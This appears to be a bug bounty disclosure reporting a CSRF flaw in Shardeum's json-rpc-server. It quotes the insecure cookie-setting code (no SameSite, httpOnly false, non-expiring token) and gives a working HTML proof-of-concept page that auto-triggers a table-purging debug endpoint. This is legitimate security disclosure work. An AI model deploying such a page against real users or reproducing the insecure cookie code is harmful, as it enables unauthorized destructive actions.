# Boost \_ Shardeum\_ Ancillaries 34367 - \[Websites and Applications - Low] CSRF vulnerability due to mi

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for [Boost | Shardeum: Ancillaries](https://immunefi.com/bounty/shardeum-ancillaries-boost/)

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: <https://github.com/shardeum/json-rpc-server/tree/dev>

Impacts:

* CSRF vulnerability allowing blackhat to perform authenticated actions
* Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

## Description

## Brief/Intro

The access-token was missing `SameSite=Strict` attribute which leads to CSRF vulnerability resulting in allowing BlackHat to perform authenticated actions.

## Vulnerability Details

In `src/routes/authenticate.ts`

```
router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  return res.send({ message: 'wrong passphrase' }).status(400)
})
```

After authenticating the rpc server does not define `SameSite=Strict` cookie restriction, which results in allowing malicious websites to call authenticated `GET` API which perform actions like purging tables,modifying config values, node subscription etc.

## Impact Details

* The vulnerability allows malicious websites performing actions like purging tables,modifying config values, node subscription etc.
* The vulnerability could result in deletion of debug data.

## References

<https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18>

## Proof of concept

## Proof of Concept

```
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>csrf performing authenticated action</title>
</head>
<body>
	<h1> calling /log/cleanTxTable which will trigger purging of table that store transaction logging </h1>
	<a href="http://127.0.0.1:8888/log/cleanTxTable"> click here to attack </a>
</body>

<script type="text/javascript">
	function callAutomatically() {
        document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }

    setTimeout(callAutomatically,3000);

</script>
</html>
```

## Steps to Reproduce

1. Authenticate to RPC server with password
2. Save the poc file as `csrfpoc.html`
3. Open `csrfpoc.html` from the browser you have authenticated with RPC server.
4. Either click on `Click here to attack` or wait 3 second for attack to happen automatically
5. You will see a response `{"success":true}`